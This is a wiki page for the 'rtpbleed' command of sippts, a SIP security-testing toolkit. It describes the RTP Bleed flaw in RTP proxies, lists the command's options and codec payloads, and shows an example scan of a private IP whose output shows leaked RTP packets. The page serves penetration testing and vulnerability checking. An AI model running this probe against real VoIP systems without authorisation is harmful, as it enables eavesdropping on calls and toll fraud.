Command rtpbleed - Pepelux/sippts GitHub Wiki

The RTP bleed Bug is a serious vulnerability in a number of RTP proxies. This weakness allows malicious users to inject and receive RTP streams of ongoing calls without needing to be positioned as man-in-the-middle. This may lead to eavesdropping of audio calls, impersonation and possibly cause toll fraud by redirecting ongoing calls.

More info about the vulnerability: https://www.rtpbleed.com/

Usage

$ sippts rtpbleed -h

Payloads
--------
   0 PCMU  (audio)
   3 GSM   (audio)
   4 G723  (audio)
   5 DVI4  (audio)
   6 DVI4  (audio)
   7 LPC   (audio)
   8 PCMA  (audio)
   9 G722  (audio)
  10 L16   (audio)
  11 L16   (audio)
  12 QCELP (audio)
  13 CN    (audio)
  14 MPA   (audio)
  15 G728  (audio)
  16 DVI4  (audio)
  17 DVI4  (audio)
  18 G729  (audio)
  25 CELLB (video)
  26 JPEG  (video)
  28 nv    (video)
  31 H261  (video)
  32 MPV   (video)
  33 MP2T  (audio/video)
  34 H263  (video)

Target:
  -i IP       Target IP address

Other options:
  -s PORT     Start port of the host (default: 10000)
  -e PORT     End port of the host (default: 20000)
  -l LOOPS    Number of times to probe the port ranges on the target(s) (default: 4)
  -p PAYLOAD  Codec payload (default: 0)
  -d DELAY    Delay for timeout in microseconds (default: 1)
  -h, --help  Show this help

Example

$ sippts rtpbleed -i 192.168.1.1

[!] Target IP: 192.168.1.1
[!] Port range: 10000-20000
[!] Payload type: 0
[!] Number of tries per port: 4
[!] Delay between tries: 50 microseconds

[+] Checking port: 10070 with payload type 0 (Seq number: 1)
[+] received 172 bytes from target port 10070 - loop 1
    [-] SSRC: 55954f70 - Timestamp: 1124640 - Seq number: 26239
[+] Checking port: 10070 with payload type 0 (Seq number: 3)
[+] received 172 bytes from target port 10070 - loop 3
    [-] SSRC: 55954f70 - Timestamp: 1125440 - Seq number: 26244